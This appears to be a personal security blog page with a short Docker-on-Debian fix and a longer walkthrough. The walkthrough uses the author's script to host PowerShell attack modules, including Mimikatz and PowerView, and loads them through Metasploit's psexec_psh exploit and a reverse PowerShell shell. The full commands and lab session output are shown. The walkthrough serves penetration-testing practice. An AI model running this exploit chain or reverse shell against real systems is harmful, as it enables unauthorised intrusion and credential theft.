Thoughts, stories, tutorials, and whatever else comes along.

Debian Jessie w/Docker

In the grand scheme of things, it probably isn't a big deal, but I get annoyed when something isn't running top notch.

I noticed on a clean docker build, when running containers I was getting an error:

WARNING: Your kernel does not support memory swappiness capabilities, memory swappiness discarded.

A bit ominous no? How could this be, I know my machine has SWAP, and there's a SWAP partition mounted. I tossed the error into Google and came back with a few unhelpful forum postings.

Later, I discovered that docker info was outputting similar errors.

WARNING: No swap limit support  
WARNING: No memory limit support  

Just as ominous and unhelpful as the first error. It was back Google where I discovered this little gem that posted the fix.

A simple modification to the GRUB_CMDLINE_LINUX_DEFAULT line in/etc/default/grub with the following:

GRUB_CMDLINE_LINUX_DEFAULT="quiet cgroup_enable=memory swapaccount=1"  

Then running sudo update-grub to seal the deal.

Now we have resolution, no more ominous errors when running containers, but what was the root cause?

It turns out that Debian (and some Ubuntu/Mint) distros do not ship with Control Groups enabled. Control groups give Linux containers the ability track and expose relevant metrics for memory and other core kernel components. Essentially, control groups allow for the policing of your memory, CPU, and I/O usage. Neat.

You can read more here: https://www.kernel.org/doc/Documentation/cgroups/cgroups.txt++

That's all for now.

Beware the JabberWock, my son!

~awh

Interactive Powershell in Metasploit

The fine folks over at Netitude were recently able to get interactive powershell payloads in Metasploit. With the ever growing arsenal of Powershell tools out there, this is huge! Thanks to Ben Turner and David Hardy for their excellent work.

More recently, Larry Spohn over at TrustedSec, wrote up a great post that shows how one could use sed and Apache to make practical use of these new payloads. There is nothing wrong with Larry's method for hosting and loading your PowerShell repository into MSF, but I figured this could all be done in one step. In that spirit, I put together a Python script named "powerserver" to accomplish this.

Running the script is simple, just feed it your PowerShell Module directory path and hosting IP information. The script will move into the directory you specified, walk over it and parse out all of the .ps1 files; it'll then print out a handy list you can copy and paste directly into MSF.

python powerserver -p /path/to/powershell_scripts -i [ip_address]:[port]

Example:

awh@jabberwock:~/$ python powerserver.py -p /opt/PowerTools/ -i 192.168.1.102:8080  
[*] Directory found

[*] Copy and paste the below to MSF:

http://192.168.1.102:8080/PowerUp/PowerUp.ps1, http://192.168.1.102:8080/PowerPick/PSInjector/PSInject.ps1, http://192.168.1.102:8080/PowerPick/PSInjector/DLLEnc.ps1, http://192.168.1.102:8080/PowerView/powerview.ps1, http://192.168.1.102:8080/PowerView/functions/Get-NetSessions.ps1, http://192.168.1.102:8080/PowerView/functions/Get-NetShare.ps1, http://192.168.1.102:8080/PowerView/functions/Invoke-ShareFinder.ps1, http://192.168.1.102:8080/PowerView/functions/Get-NetLoggedon.ps1, http://192.168.1.102:8080/PowerView/functions/Invoke-UserHunter.ps1, http://192.168.1.102:8080/PowerView/functions/Invoke-Netview.ps1, http://192.168.1.102:8080/PowerView/functions/Get-Net.ps1, http://192.168.1.102:8080/PowerBreach/PowerBreach.ps1, http://192.168.1.102:8080/PewPewPew/Invoke-MassTokens.ps1, http://192.168.1.102:8080/PewPewPew/Invoke-MassMimikatz.ps1, http://192.168.1.102:8080/PewPewPew/Invoke-MassCommand.ps1, http://192.168.1.102:8080/PewPewPew/Invoke-MassTemplate.ps1, http://192.168.1.102:8080/PewPewPew/Invoke-MassSearch.ps1

[*] Now starting webserver

[*] serving at port 8080

With our Python SimpleHTTPServer up and running, we can configure Metasploit. For simplicity, I'm using the "psexec_psh" module in MSF and I'll be using the x64 bit Interactive Powershell Payload.

Set the payload to any of the interactive powershell payloads:

msf exploit(psexec_psh) > show options

...

Payload options (windows/x64/powershell_reverse_tcp):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   EXITFUNC      thread           yes       Exit technique (Accepted: , , seh, thread, process, none)
   LHOST         192.168.1.102    yes       The listen address
   LOAD_MODULES                   no        A list of powershell modules seperated by a comma to download over the web
   LPORT         4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic

You can preload your modules, with the list that the script generated. Simply set the "LOAD_MODULES" option:

msf exploit(psexec_psh) > set LOAD_MODULES http://192.168.1.102:8080/PowerUp/PowerUp.ps1, http://192.168.1.102:8080/PowerPick/PSInjector/PSInject.ps1, http://192.168.1.102:8080/PowerPick/PSInjector/DLLEnc.ps1, http://192.168.1.102:8080/PowerView/powerview.ps1, http://192.168.1.102:8080/PowerView/functions/Get-NetSessions.ps1, http://192.168.1.102:8080/PowerView/functions/Get-NetShare.ps1, http://192.168.1.102:8080/PowerView/functions/Invoke-ShareFinder.ps1, http://192.168.1.102:8080/PowerView/functions/Get-NetLoggedon.ps1, http://192.168.1.102:8080/PowerView/functions/Invoke-UserHunter.ps1, http://192.168.1.102:8080/PowerView/functions/Invoke-Netview.ps1, http://192.168.1.102:8080/PowerView/functions/Get-Net.ps1, http://192.168.1.102:8080/PowerBreach/PowerBreach.ps1, http://192.168.1.102:8080/PewPewPew/Invoke-MassTokens.ps1, http://192.168.1.102:8080/PewPewPew/Invoke-MassMimikatz.ps1, http://192.168.1.102:8080/PewPewPew/Invoke-MassCommand.ps1, http://192.168.1.102:8080/PewPewPew/Invoke-MassTemplate.ps1, http://192.168.1.102:8080/PewPewPew/Invoke-MassSearch.ps1  
LOAD_MODULES => http://192.168.1.102:8080/PowerUp/PowerUp.ps1, http://192.168.1.102:8080/PowerPick/PSInjector/PSInject.ps1, http://192.168.1.102:8080/PowerPick/PSInjector/DLLEnc.ps1, http://192.168.1.102:8080/PowerView/powerview.ps1, http://192.168.1.102:8080/PowerView/functions/Get-NetSessions.ps1, http://192.168.1.102:8080/PowerView/functions/Get-NetShare.ps1, http://192.168.1.102:8080/PowerView/functions/Invoke-ShareFinder.ps1, http://192.168.1.102:8080/PowerView/functions/Get-NetLoggedon.ps1, http://192.168.1.102:8080/PowerView/functions/Invoke-UserHunter.ps1, http://192.168.1.102:8080/PowerView/functions/Invoke-Netview.ps1, http://192.168.1.102:8080/PowerView/functions/Get-Net.ps1, http://192.168.1.102:8080/PowerBreach/PowerBreach.ps1, http://192.168.1.102:8080/PewPewPew/Invoke-MassTokens.ps1, http://192.168.1.102:8080/PewPewPew/Invoke-MassMimikatz.ps1, http://192.168.1.102:8080/PewPewPew/Invoke-MassCommand.ps1, http://192.168.1.102:8080/PewPewPew/Invoke-MassTemplate.ps1, http://192.168.1.102:8080/PewPewPew/Invoke-MassSearch.ps1


msf exploit(psexec_psh) > exploit

[*] Loading 17 modules into the interactive PowerShell session
[*] Started reverse SSL handler on 192.168.1.102:4444 
[*] 192.168.121.128:445 - Executing the payload...
[+] 192.168.121.128:445 - Service start timed out, OK if running a command or non-service executable...
[*] Powershell session session 3 opened (192.168.1.102:4444 -> 192.168.1.102:35899) at 2015-07-21 11:36:59 -0600

Windows PowerShell running as user BOB$ on TESTBOX1  
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

[+] Loading modules.

PS C:\Windows\system32>  

Awesome, and with our shell we should be able to see one of the PowerTools scripts:

PS C:\Windows\system32>get-help get-serviceperms

NAME  
    Get-ServicePerms

SYNOPSIS  
    Returns a list of services that the user can modify.


SYNTAX  
    Get-ServicePerms [<CommonParameters>]


DESCRIPTION  
    This function enumerates all available services and tries to
    open the service for modification, returning the service object
    if the process doesn't failed.


RELATED LINKS

REMARKS  
    To see the examples, type: "get-help Get-ServicePerms -examples".
    For more information, type: "get-help Get-ServicePerms -detailed".
    For technical information, type: "get-help Get-ServicePerms -full".



PS C:\Windows\system32>  

Installing is easy, peasy, lime and squeezy:

git clone https://github.com/awhitehatter/powerserver.git

Beware the JabberWock, my son!

~awh